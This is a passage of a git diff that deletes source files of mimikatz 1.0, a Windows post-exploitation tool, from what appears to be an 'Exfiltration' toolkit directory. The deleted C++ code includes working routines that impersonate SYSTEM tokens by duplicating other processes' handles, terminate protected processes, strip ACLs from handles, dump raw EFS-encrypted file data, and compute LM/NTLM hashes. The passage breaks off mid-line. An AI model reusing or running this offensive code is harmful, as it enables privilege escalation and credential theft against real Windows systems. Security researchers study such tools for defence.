monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(infos, L"infos", L"Affiche des informations basiques sur un fichier chiffré")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(full, L"full", L"Affiche des informations très détaillées sur un fichier chiffré")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(toraw, L"toraw", L"Dump les données EFS d'un fichier chiffré vers un fichier brut")); - // monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(fromraw, L"fromraw")); - return monVector; -} - -bool mod_mimikatz_efs::infos(vector<wstring> * arguments) -{ - if(!arguments->empty()) - { - PENCRYPTION_CERTIFICATE_HASH_LIST pHashes = NULL; - - if(QueryUsersOnEncryptedFile(arguments->front().c_str(), &pHashes) == ERROR_SUCCESS) - { - (*outputStream) << L"Utilisateur(s) déclaré(s) : " << pHashes->nCert_Hash << endl; - printInfos(pHashes); - FreeEncryptionCertificateHashList(pHashes); - } - else (*outputStream) << L"Erreur QueryUsersOnEncryptedFile : " << mod_system::getWinError() << endl; - - if(QueryRecoveryAgentsOnEncryptedFile(arguments->front().c_str(), &pHashes) == ERROR_SUCCESS) - { - (*outputStream) << L"Agent(s) de recouvrement : " << pHashes->nCert_Hash << endl; - printInfos(pHashes); - FreeEncryptionCertificateHashList(pHashes); - } - else (*outputStream) << L"Erreur QueryRecoveryAgentsOnEncryptedFile : " << mod_system::getWinError() << endl; - - } - return true; -} - -bool mod_mimikatz_efs::full(vector<wstring> * arguments) -{ - if(!arguments->empty()) - { - PVOID pvContext = NULL; - if(OpenEncryptedFileRaw(arguments->front().c_str(), 0, &pvContext) == ERROR_SUCCESS) - { - SIMPLE_BYTE_ARRAY sba = {0, reinterpret_cast<BYTE *>(malloc(0))}; - if(ReadEncryptedFileRaw(ExportToArrayCallback, &sba, pvContext) == ERROR_SUCCESS) - { - PEFS_FEK Fek = NULL; - PEFS_STREAM_DATA_SEGMENT monDataSegment = NULL; - for( - PEFS_MARSHALED_STREAM monMarshaledStream = reinterpret_cast<PEFS_MARSHALED_STREAM>(sba.tableau + sizeof(EFS_RAW)); - reinterpret_cast<PBYTE>(monMarshaledStream) < (sba.tableau + sba.nbElements); - monMarshaledStream = reinterpret_cast<PEFS_MARSHALED_STREAM>(monDataSegment) - ) - { - - bool isEFSMetaData = (monMarshaledStream->NameLenght == 2) && (monMarshaledStream->StreamName[0] == 0x1910); - - (*outputStream) << endl << - L"Marshaled Stream :" << endl << - L" * Taille : " << monMarshaledStream->Length << endl << - L" * Flag : " << monMarshaledStream->Flag << endl << - L" * Nom : " << (isEFSMetaData ? wstring(L"(EFS Metadata stream)") : wstring(monMarshaledStream->StreamName, monMarshaledStream->NameLenght / sizeof(wchar_t))) << endl << - L" * Type : " << (isEFSMetaData ? L"EFS Metadata" : L"DATA") << endl << - endl; - - for( - monDataSegment = reinterpret_cast<PEFS_STREAM_DATA_SEGMENT>(reinterpret_cast<PBYTE>(monMarshaledStream) + monMarshaledStream->Length); - (reinterpret_cast<PBYTE>(monDataSegment) < (sba.tableau + sba.nbElements)) && (monDataSegment->GURE0 == 0x00550047) && (monDataSegment->GURE1 == 0x00450052); - monDataSegment = reinterpret_cast<PEFS_STREAM_DATA_SEGMENT>(reinterpret_cast<PBYTE>(monDataSegment) + monDataSegment->Length) - ) - - { - (*outputStream) << L"DataSegment : " << endl; - PBYTE StreamData = reinterpret_cast<PBYTE>(monDataSegment) + sizeof(EFS_STREAM_DATA_SEGMENT); - - if(isEFSMetaData) - { - (*outputStream) << L" EFS Metadata :" << endl; - - PEFS_METADATA_1 mesAttr = reinterpret_cast<PEFS_METADATA_1>(StreamData); - (*outputStream) << L" * Version EFS : " << mesAttr->EFS_Version << endl; - if(mesAttr->DDF_Offset) - { - (*outputStream) << L" * Utilisateur(s) déclaré(s) :" << endl; - fullInfosFromEFS_KEY_LIST(mesAttr, mesAttr->DDF_Offset, &Fek); - } - if(mesAttr->DRF_Offset) - { - (*outputStream) << L" * Agent(s) de recouvrement :" << endl; - fullInfosFromEFS_KEY_LIST(mesAttr, mesAttr->DRF_Offset, &Fek); - } - } - else - { - (*outputStream) << L" DATA :" << endl; - if(!monMarshaledStream->Flag) - { - (*outputStream) << L" DATA Segment Encryption Header :" << endl; - PEFS_STREAM_DATA_SEGMENT_ENCRYPTION_HEADER monSegEncHead = reinterpret_cast<PEFS_STREAM_DATA_SEGMENT_ENCRYPTION_HEADER>(StreamData); - (*outputStream) << - L" * Length : " << monSegEncHead->Length << endl << - L" * StartingFile_Offset : " << monSegEncHead->StartingFile_Offset << endl << - L" * BytesWithinStreamSize : " << monSegEncHead->BytesWithinStreamSize << endl << - L" * BytesWithinVDL : " << monSegEncHead->BytesWithinVDL << endl << - L" * DataUnitShift : " << monSegEncHead->DataUnitShift << endl << - L" * ChunkShift : " << monSegEncHead->ChunkShift << endl << - L" * ClusterShift : " << monSegEncHead->ClusterShift << endl << - L" * NumberOfDataBlocks : " << monSegEncHead->NumberOfDataBlocks << endl << - endl; - - PEFS_EXTENDED_HEADER monExtHeader = reinterpret_cast<PEFS_EXTENDED_HEADER>(reinterpret_cast<PBYTE>(monSegEncHead) + FIELD_OFFSET(EFS_STREAM_DATA_SEGMENT_ENCRYPTION_HEADER, DataBlockSizes) + (sizeof(DWORD) * monSegEncHead->NumberOfDataBlocks)); - if(monExtHeader->EXTD_Number == 'DTXE') - { - (*outputStream) << L" * Extended Header Flag : " << monExtHeader->Flags << endl; - } - - for(DWORD block = 0; block < monSegEncHead->NumberOfDataBlocks; block++) - { - (*outputStream) << L" -> Block " << block+1 << L" ; taille : " << monSegEncHead->DataBlockSizes[block] << endl; - - PBYTE mesDatas = reinterpret_cast<PBYTE>(StreamData) + monSegEncHead->Length; - (*outputStream) << mod_text::stringOfHex(mesDatas, monSegEncHead->DataBlockSizes[block], 16) << endl; - - if(Fek); - } - } - else - { - (*outputStream) << L"TODO Data" << endl; - } - } - } - } - } - else (*outputStream) << L"Erreur ReadEncryptedFileRaw : " << mod_system::getWinError() << endl; - - free(sba.tableau); - CloseEncryptedFileRaw(pvContext); - } - else (*outputStream) << L"Erreur OpenEncryptedFileRaw : " << mod_system::getWinError() << endl; - } - return true; -} - -bool mod_mimikatz_efs::toraw(vector<wstring> * arguments) -{ - if(arguments->size() == 2) - { - PVOID pvContext = NULL; - (*outputStream) << L"Ouverture de : " << arguments->front() << endl; - if(OpenEncryptedFileRaw(arguments->front().c_str(), 0, &pvContext) == ERROR_SUCCESS) - { - (*outputStream) << L"Vers : " << arguments->back() << endl; - HANDLE hFile = CreateFile(arguments->back().c_str(), GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); - if(ReadEncryptedFileRaw(ExportToFileCallback, &hFile, pvContext) == ERROR_SUCCESS) - { - (*outputStream) << L" * Export OK" << endl; - } - else (*outputStream) << L"* Erreur ReadEncryptedFileRaw : " << mod_system::getWinError() << endl; - CloseHandle(hFile); - CloseEncryptedFileRaw(pvContext); - } - else (*outputStream) << L"Erreur OpenEncryptedFileRaw : " << mod_system::getWinError() << endl; - } - return true; -} - -void mod_mimikatz_efs::printInfos(PENCRYPTION_CERTIFICATE_HASH_LIST hashList) -{ - for(DWORD i = 0; i < hashList->nCert_Hash; i++) - { - wstring user; - mod_secacl::simpleSidToString(hashList->pUsers[i]->pUserSid, &user); - - (*outputStream) << - L" * Nom : " << user << endl << - L" * Nom simple : " << hashList->pUsers[i]->lpDisplayInformation << endl << - L" * Hash du certificat : " << mod_text::stringOfHex(hashList->pUsers[i]->pHash->pbData, hashList->pUsers[i]->pHash->cbData) << endl << - endl; - } -} - -DWORD WINAPI mod_mimikatz_efs::ExportToArrayCallback(PBYTE pbData, PVOID pvCallbackContext, DWORD ulLength) -{ - if(ulLength) - { - PSIMPLE_BYTE_ARRAY sba = reinterpret_cast<PSIMPLE_BYTE_ARRAY>(pvCallbackContext); - sba->tableau = reinterpret_cast<PBYTE>(realloc(sba->tableau, sba->nbElements + ulLength)); - if(sba->tableau) - { - RtlCopyMemory(sba->tableau + sba->nbElements, pbData, ulLength); - sba->nbElements += ulLength; - } - else - return ERROR_NOT_ENOUGH_MEMORY; - } - return ERROR_SUCCESS; -} - -DWORD WINAPI mod_mimikatz_efs::ExportToFileCallback(PBYTE pbData, PVOID pvCallbackContext, ULONG ulLength) -{ - if(ulLength) - { - (*outputStream) << L" - Lecture d\'un bloc de : " << ulLength << endl; - DWORD dwBytesWritten = 0; - if(WriteFile(*reinterpret_cast<PHANDLE>(pvCallbackContext), pbData, ulLength, &dwBytesWritten, NULL) && (ulLength == dwBytesWritten)) - return ERROR_SUCCESS; - return GetLastError(); - } - return ERROR_SUCCESS; -} - -bool mod_mimikatz_efs::fullInfosFromEFS_KEY_LIST(PEFS_METADATA_1 header, LONG KeyList_offset, PEFS_FEK * pFek) -{ - *pFek = NULL; - PEFS_KEY_LIST monHead = reinterpret_cast<PEFS_KEY_LIST>(reinterpret_cast<PBYTE>(header) + KeyList_offset); - - PEFS_KEY_LIST_ENTRY monHeader = reinterpret_cast<PEFS_KEY_LIST_ENTRY>(monHead); - DWORD previousSize = sizeof(PEFS_KEY_LIST); - for(DWORD i = 0; i < monHead->Length; i++) - { - (*outputStream) << endl << L" Champ de données " << (i + 1) << L" :" << endl; - monHeader = reinterpret_cast<PEFS_KEY_LIST_ENTRY>((PBYTE) monHeader + previousSize); - - PEFS_PUBLIC_KEY_INFORMATION monCredHeader = reinterpret_cast<PEFS_PUBLIC_KEY_INFORMATION>(reinterpret_cast<PBYTE>(monHeader) + monHeader->PKI_Offset); - wstring user; - if(monCredHeader->OwnerSID_offset) - mod_secacl::simpleSidToString((reinterpret_cast<PBYTE>(monCredHeader) + monCredHeader->OwnerSID_offset), &user); - else user.assign(L"(null)"); - - (*outputStream) << L" * Utilisateur : " << user << endl; - fullInfosFromEFS_CERTIFICATE_DATA(monCredHeader, monCredHeader->Certificate_offset); - - PBYTE Encrypted_FEK = reinterpret_cast<PBYTE>(monHeader) + monHeader->Enc_FEK_Offset; - (*outputStream) << - L" * Flags : " << monHeader->Flags << endl << - L" * FEK (chiffrée) : " << endl << - L" -> Taille : " << monHeader->Enc_FEK_Length << endl << - L" -> Données : " << endl << mod_text::stringOfHex(Encrypted_FEK, monHeader->Enc_FEK_Length, 16) << endl << - endl; - - /*HCRYPTPROV hCryptKeyProv; - if(CryptAcquireContext(&hCryptKeyProv, L"", MS_STRONG_PROV, PROV_RSA_FULL, NULL )) - { - HCRYPTKEY maCle = NULL; - if(CryptGetUserKey(hCryptKeyProv, AT_KEYEXCHANGE, &maCle)) - { - DWORD taille = monHeader->Enc_FEK_Length; - if (CryptDecrypt(maCle, 0, TRUE, 0, Encrypted_FEK, &taille) ) - { - *pFek = reinterpret_cast<PEFS_FEK>(Encrypted_FEK); - (*outputStream) << - L" * FEK (clair) : " << endl << - L" -> Taille : " << (*pFek)->Key_Lenght << endl << - L" -> Algorithme : " << (*pFek)->Algorithm << endl << - L" -> Entropie : " << (*pFek)->Entropy << endl << - L" -> Données : " << endl << mod_text::stringOfHex((*pFek)->Key, (*pFek)->Key_Lenght, 16) << endl << - endl; - } - else - (*outputStream) << mod_system::getWinError() << endl; - } - CryptReleaseContext(hCryptKeyProv, 0); - }*/ - - previousSize = monHeader->Length; - } - - return (*pFek != NULL); -} - -void mod_mimikatz_efs::fullInfosFromEFS_CERTIFICATE_DATA(PEFS_PUBLIC_KEY_INFORMATION header, LONG Certificate_offset) -{ - PEFS_CERTIFICATE_DATA monThCertificate = reinterpret_cast<PEFS_CERTIFICATE_DATA>(reinterpret_cast<PBYTE>(header) + header->Certificate_offset); - - (*outputStream) << L" -> Nom affiché : "; - if(monThCertificate->DisplayName_Offset) - (*outputStream) << reinterpret_cast<wchar_t *>(reinterpret_cast<PBYTE>(monThCertificate) + monThCertificate->DisplayName_Offset); - (*outputStream) << endl; - - (*outputStream) << L" -> Provider : "; - if(monThCertificate->ProviderName_Offset) - (*outputStream) << reinterpret_cast<wchar_t *>(reinterpret_cast<PBYTE>(monThCertificate) + monThCertificate->ProviderName_Offset); - (*outputStream) << endl; - - (*outputStream) << L" -> Container : "; - if(monThCertificate->ContainerName_Offset) - (*outputStream) << reinterpret_cast<wchar_t *>(reinterpret_cast<PBYTE>(monThCertificate) + monThCertificate->ContainerName_Offset); - (*outputStream) << endl; - - (*outputStream) << L" -> Empreinte : " << mod_text::stringOfHex(reinterpret_cast<PBYTE>(monThCertificate) + monThCertificate->CertificateThumbprint, monThCertificate->CertificateThumbprint_Length) << endl; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_efs.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_efs.h deleted file mode 100644 index 0a82140..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_efs.h +++ /dev/null @@ -1,133 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include <WinEFS.h> -#include <iostream> -#include "mod_text.h" -#include "mod_system.h" -#include "mod_secacl.h" -#include "mod_crypto.h" - -class mod_mimikatz_efs -{ -private: - // http://msdn.microsoft.com/library/cc230447.aspx - typedef struct _EFS_RAW { - DWORD Unknown0; - DWORD ROBS0; - DWORD ROBS1; - BYTE Reserved[8]; - } EFS_RAW, *PEFS_RAW; - - typedef struct _EFS_MARSHALED_STREAM { - DWORD Length; - DWORD NTFS0; - DWORD NTFS1; - DWORD Flag; - BYTE Reserved[8]; - DWORD NameLenght; - wchar_t StreamName[1]; - } EFS_MARSHALED_STREAM, *PEFS_MARSHALED_STREAM; - - typedef struct _EFS_STREAM_DATA_SEGMENT { - DWORD Length; - DWORD GURE0; - DWORD GURE1; - DWORD Reserved; - } EFS_STREAM_DATA_SEGMENT, *PEFS_STREAM_DATA_SEGMENT; - - typedef struct _EFS_STREAM_DATA_SEGMENT_ENCRYPTION_HEADER { - LONG64 StartingFile_Offset; - DWORD Length; - DWORD BytesWithinStreamSize; - DWORD BytesWithinVDL; - USHORT ReservedForAlignement0; - BYTE DataUnitShift; - BYTE ChunkShift; - BYTE ClusterShift; - BYTE ReservedForAlignement1; - USHORT NumberOfDataBlocks; - DWORD DataBlockSizes[1]; - } EFS_STREAM_DATA_SEGMENT_ENCRYPTION_HEADER, *PEFS_STREAM_DATA_SEGMENT_ENCRYPTION_HEADER; - - typedef struct _EFS_EXTENDED_HEADER { - DWORD EXTD_Number; - DWORD Length; - DWORD Flags; - DWORD Reserved; - } EFS_EXTENDED_HEADER, *PEFS_EXTENDED_HEADER; - - typedef struct _EFS_METADATA_1 { - DWORD Length; - DWORD Reserved1; - DWORD EFS_Version; - DWORD Reserved2; - BYTE EFS_ID[16]; - BYTE EFS_Hash[16]; - BYTE Reserved3[16]; - LONG DDF_Offset; - LONG DRF_Offset; - BYTE Reserved4[12]; - } EFS_METADATA_1, *PEFS_METADATA_1; - - typedef struct _EFS_KEY_LIST { - DWORD Length; - } EFS_KEY_LIST, *PEFS_KEY_LIST; - - typedef struct _EFS_KEY_LIST_ENTRY { - DWORD Length; - LONG PKI_Offset; - DWORD Enc_FEK_Length; - LONG Enc_FEK_Offset; - DWORD Flags; - } EFS_KEY_LIST_ENTRY, *PEFS_KEY_LIST_ENTRY; - - typedef struct _EFS_PUBLIC_KEY_INFORMATION { - DWORD Length; - LONG OwnerSID_offset; - DWORD Type; - DWORD Certificate_Length; - LONG Certificate_offset; - } EFS_PUBLIC_KEY_INFORMATION, *PEFS_PUBLIC_KEY_INFORMATION; - - typedef struct _EFS_CERTIFICATE_DATA { - LONG CertificateThumbprint; - DWORD CertificateThumbprint_Length; - LONG ContainerName_Offset; - LONG ProviderName_Offset;; - LONG DisplayName_Offset; - } EFS_CERTIFICATE_DATA, *PEFS_CERTIFICATE_DATA; - - typedef struct _EFS_FEK { - DWORD Key_Lenght; - DWORD Entropy; - ALG_ID Algorithm; - DWORD Reserverd; - BYTE Key[1]; - } EFSFEK, *PEFS_FEK; - - typedef struct _SIMPLE_BYTE_ARRAY{ - SIZE_T nbElements; - PBYTE tableau; - } SIMPLE_BYTE_ARRAY, *PSIMPLE_BYTE_ARRAY; - - static DWORD WINAPI ExportToArrayCallback(PBYTE pbData, PVOID pvCallbackContext, DWORD ulLength); - static DWORD WINAPI ExportToFileCallback(PBYTE pbData, PVOID pvCallbackContext, DWORD ulLength); - static void printInfos(PENCRYPTION_CERTIFICATE_HASH_LIST hashList); - - static bool fullInfosFromEFS_KEY_LIST(PEFS_METADATA_1 header, LONG KeyList_offset, PEFS_FEK * Fek); - static void fullInfosFromEFS_CERTIFICATE_DATA(PEFS_PUBLIC_KEY_INFORMATION header, LONG Certificate_offset); - -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool infos(vector<wstring> * arguments); - static bool full(vector<wstring> * arguments); - static bool toraw(vector<wstring> * arguments); - static bool fromraw(vector<wstring> * arguments); -}; - diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_handle.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_handle.cpp deleted file mode 100644 index 8e45ee6..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_handle.cpp +++ /dev/null @@ -1,301 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_handle.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_handle::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(list, L"list", L"Affiche les handles du système (pour le moment juste les processus et tokens)")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(processStop, L"processStop", L"Essaye de stopper un ou plusieurs processus en utilisant d\'autres handles")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(tokenImpersonate, L"tokenImpersonate", L"Essaye d\'impersonaliser un token en utilisant d\'autres handles")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(nullAcl, L"nullAcl", L"Positionne une ACL null sur des Handles")); - return monVector; -} - -bool mod_mimikatz_handle::list(vector<wstring> * arguments) -{ - vector<mod_process::KIWI_PROCESSENTRY32> * mesProcess = new vector<mod_process::KIWI_PROCESSENTRY32>(); - - bool isProcessList = mod_process::getList(mesProcess); - vector<SYSTEM_HANDLE> * mesHandles = new vector<SYSTEM_HANDLE>(); - - DWORD id = (!arguments->empty() ? _wtoi(arguments->front().c_str()) : 0); - - if(mod_system::getSystemHandles(mesHandles, arguments->empty() ? NULL : &id)) - { - for(vector<SYSTEM_HANDLE>::iterator monHandle = mesHandles->begin(); monHandle != mesHandles->end(); monHandle++) - { - HANDLE hProcess; - if(hProcess = OpenProcess(PROCESS_DUP_HANDLE, false, monHandle->ProcessId)) - { - HANDLE nouveauHandle; - if(DuplicateHandle(hProcess, reinterpret_cast<HANDLE>(monHandle->Handle), GetCurrentProcess(), &nouveauHandle, 0, false, DUPLICATE_SAME_ACCESS)) - { - wstring tokenType; - if(mod_system::getHandleType(nouveauHandle, &tokenType)) - { - bool isToken = (_wcsicmp(tokenType.c_str(), L"token") == 0); - bool isProcess = (_wcsicmp(tokenType.c_str(), L"process") == 0); - - if(isToken || isProcess) - { - (*outputStream) << setw(5) << setfill(wchar_t(' ')) << monHandle->ProcessId << L" "; - - if(isProcessList) - { - mod_process::KIWI_PROCESSENTRY32 * processHote = new mod_process::KIWI_PROCESSENTRY32(); - if(mod_process::getProcessEntryFromProcessId(monHandle->ProcessId, processHote, mesProcess)) - (*outputStream) << setw(25) << setfill(wchar_t(' ')) << left << processHote->szExeFile << right; - delete processHote; - } - - (*outputStream) << L" -> " << setw(5) << setfill(wchar_t(' ')) << monHandle->Handle << L'\t' << tokenType << L'\t'; - - if(isToken) - { - wstring userName, domainName; - if(mod_secacl::tokenUser(nouveauHandle, &userName, &domainName)) - (*outputStream) << L'\t' << domainName << L'\\' << userName ; - else (*outputStream) << mod_system::getWinError(); - } - else if(isProcess) - { - DWORD monPid = GetProcessId(nouveauHandle); - (*outputStream) << monPid; - - if(isProcessList) - { - mod_process::KIWI_PROCESSENTRY32 * processKiwi = new mod_process::KIWI_PROCESSENTRY32(); - if(mod_process::getProcessEntryFromProcessId(monPid, processKiwi, mesProcess)) - (*outputStream) << L'\t' << processKiwi->szExeFile; - delete processKiwi; - } - } - (*outputStream) << endl; - } - } - CloseHandle(nouveauHandle); - } - CloseHandle(hProcess); - } - } - } - else (*outputStream) << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl; - - delete mesHandles; - - return true; -} - -bool mod_mimikatz_handle::processStop(vector<wstring> * arguments) -{ - vector<mod_process::KIWI_PROCESSENTRY32> * mesProcess = new vector<mod_process::KIWI_PROCESSENTRY32>(); - - bool isProcessList = mod_process::getList(mesProcess); - vector<SYSTEM_HANDLE> * mesHandles = new vector<SYSTEM_HANDLE>(); - - if(mod_system::getSystemHandles(mesHandles)) - { - for(vector<SYSTEM_HANDLE>::iterator monHandle = mesHandles->begin(); monHandle != mesHandles->end(); monHandle++) - { - HANDLE hProcess; - if(hProcess = OpenProcess(PROCESS_DUP_HANDLE, false, monHandle->ProcessId)) - { - HANDLE nouveauHandle; - if(DuplicateHandle(hProcess, reinterpret_cast<HANDLE>(monHandle->Handle), GetCurrentProcess(), &nouveauHandle, 0, false, DUPLICATE_SAME_ACCESS)) - { - wstring tokenType; - if(mod_system::getHandleType(nouveauHandle, &tokenType)) - { - if(_wcsicmp(tokenType.c_str(), L"process") == 0) - { - if(isProcessList) - { - mod_process::KIWI_PROCESSENTRY32 * processHote = new mod_process::KIWI_PROCESSENTRY32(); - mod_process::KIWI_PROCESSENTRY32 * processKiwi = new mod_process::KIWI_PROCESSENTRY32(); - DWORD monPid = GetProcessId(nouveauHandle); - if( - mod_process::getProcessEntryFromProcessId(monHandle->ProcessId, processHote, mesProcess) && - mod_process::getProcessEntryFromProcessId(monPid, processKiwi, mesProcess) - ) - { - - for(vector<wstring>::iterator monProcessName = arguments->begin(); monProcessName != arguments->end(); monProcessName++) - { - if(_wcsicmp(processKiwi->szExeFile.c_str(), monProcessName->c_str()) == 0) - { - (*outputStream) << - setw(5) << setfill(wchar_t(' ')) << monHandle->ProcessId << L" " << - setw(25) << setfill(wchar_t(' ')) << left << processHote->szExeFile << right << L" -> " << - setw(5) << setfill(wchar_t(' ')) << monHandle->Handle << L'\t' << - monPid << L'\t' << processKiwi->szExeFile << endl; - ; - - - (*outputStream) << L"\tTerminate Process - "; - if(TerminateProcess(nouveauHandle, ERROR_SUCCESS) != 0) - { - (*outputStream) << L"OK"; - } - else - { - (*outputStream) << L"KO ; " << mod_system::getWinError() << endl << - L"\tJob : "; - - if(HANDLE monObject = CreateJobObject(NULL, NULL)) - { - if(AssignProcessToJobObject(monObject, nouveauHandle)) - { - (*outputStream) << L"TerminateJobObject - "; - if(TerminateJobObject(monObject, ERROR_SUCCESS) != 0) - { - (*outputStream) << L"OK"; - } - else (*outputStream) << L"KO ; " << mod_system::getWinError(); - } - else (*outputStream) << L"AssignProcessToJobObject - KO ; " << mod_system::getWinError(); - CloseHandle(monObject); - } - - } - - (*outputStream) << endl; - } - } - } - delete processKiwi; - delete processHote; - } - } - } - CloseHandle(nouveauHandle); - } - CloseHandle(hProcess); - } - } - } - else (*outputStream) << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl; - - delete mesHandles; - - return true; -} - -bool mod_mimikatz_handle::tokenImpersonate(vector<wstring> * arguments) -{ - PNT_SET_INFORMATION_PROCESS NtSetInformationProcess = reinterpret_cast<PNT_SET_INFORMATION_PROCESS>(GetProcAddress(GetModuleHandle(L"ntdll"), "NtSetInformationProcess")); - vector<mod_process::KIWI_PROCESSENTRY32> * mesProcess = new vector<mod_process::KIWI_PROCESSENTRY32>(); - - bool isProcessList = mod_process::getList(mesProcess); - vector<SYSTEM_HANDLE> * mesHandles = new vector<SYSTEM_HANDLE>(); - - if(mod_system::getSystemHandles(mesHandles)) - { - for(vector<SYSTEM_HANDLE>::iterator monHandle = mesHandles->begin(); monHandle != mesHandles->end(); monHandle++) - { - HANDLE hProcess; - if(hProcess = OpenProcess(PROCESS_DUP_HANDLE, false, monHandle->ProcessId)) - { - HANDLE nouveauHandle; - if(DuplicateHandle(hProcess, reinterpret_cast<HANDLE>(monHandle->Handle), GetCurrentProcess(), &nouveauHandle, 0, false, DUPLICATE_SAME_ACCESS)) - { - wstring tokenType; - if(mod_system::getHandleType(nouveauHandle, &tokenType)) - { - if(_wcsicmp(tokenType.c_str(), L"token") == 0) - { - if(isProcessList) - { - mod_process::KIWI_PROCESSENTRY32 * processHote = new mod_process::KIWI_PROCESSENTRY32(); - if( - mod_process::getProcessEntryFromProcessId(monHandle->ProcessId, processHote, mesProcess) - ) - { - wstring userName, domainName; - if(mod_secacl::tokenUser(nouveauHandle, &userName, &domainName)) - { - if(_wcsicmp(userName.c_str(), (arguments->empty() ? L"system" : arguments->front().c_str())) == 0) - { - (*outputStream) << - setw(5) << setfill(wchar_t(' ')) << monHandle->ProcessId << L" " << - setw(25) << setfill(wchar_t(' ')) << left << processHote->szExeFile << right << L" -> " << - setw(5) << setfill(wchar_t(' ')) << monHandle->Handle << L'\t' << - domainName << L'\\' << userName << L'\t'; - - if(mod_secacl::exchangeDupToken(&nouveauHandle)) - { - if(ImpersonateLoggedOnUser(nouveauHandle)) - { - (*outputStream) << L"ok !!" << endl; - break; - } - else - { - (*outputStream) << L"ko - ImpersonateLoggedOnUser ; " << mod_system::getWinError() << endl; - } - } - else - { - (*outputStream) << L"ko - mod_secacl::exchangeDupToken ; " << mod_system::getWinError() << endl; - } - - } - } - else (*outputStream) << mod_system::getWinError(); - } - delete processHote; - } - } - } - CloseHandle(nouveauHandle); - } - CloseHandle(hProcess); - } - } - } - else (*outputStream) << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl; - - delete mesHandles; - - return true; -} - -bool mod_mimikatz_handle::nullAcl(vector<wstring> * arguments) -{ - vector<SYSTEM_HANDLE> * mesHandles = new vector<SYSTEM_HANDLE>(); - if(mod_system::getSystemHandles(mesHandles)) - { - for(vector<SYSTEM_HANDLE>::iterator monHandle = mesHandles->begin(); monHandle != mesHandles->end(); monHandle++) - { - HANDLE hProcess; - if(hProcess = OpenProcess(PROCESS_DUP_HANDLE, false, monHandle->ProcessId)) - { - HANDLE nouveauHandle; - if(DuplicateHandle(hProcess, reinterpret_cast<HANDLE>(monHandle->Handle), GetCurrentProcess(), &nouveauHandle, 0, false, DUPLICATE_SAME_ACCESS)) - { - wstring tokenType; - if(mod_system::getHandleType(nouveauHandle, &tokenType)) - { - bool toACL = true;; - if(!arguments->empty()) - toACL = find(arguments->begin(), arguments->end(), tokenType) != arguments->end(); - - if(toACL) - (*outputStream) << monHandle->ProcessId << L'\t' << monHandle->Handle << L'\t' << tokenType << L"\t\t" << (mod_secacl::nullSdToHandle(&nouveauHandle) ? L"NULL !" : L"KO") << endl; - } - CloseHandle(nouveauHandle); - } - CloseHandle(hProcess); - } - } - } - else (*outputStream) << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl; - - delete mesHandles; - - return true; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_handle.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_handle.h deleted file mode 100644 index 961991c..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_handle.h +++ /dev/null @@ -1,23 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_system.h" -#include "mod_process.h" -#include "mod_secacl.h" -#include <iostream> -#include <algorithm> - -class mod_mimikatz_handle -{ -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool list(vector<wstring> * arguments); - static bool processStop(vector<wstring> * arguments); - static bool tokenImpersonate(vector<wstring> * arguments); - static bool nullAcl(vector<wstring> * arguments); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_hash.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_hash.cpp deleted file mode 100644 index 302c05e..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_hash.cpp +++ /dev/null @@ -1,43 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_hash.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_hash::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(lm, L"lm", L"Hash LanManager (LM) d\'une chaîne de caractères")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(ntlm, L"ntlm", L"Hash NT LanManger (NTLM) 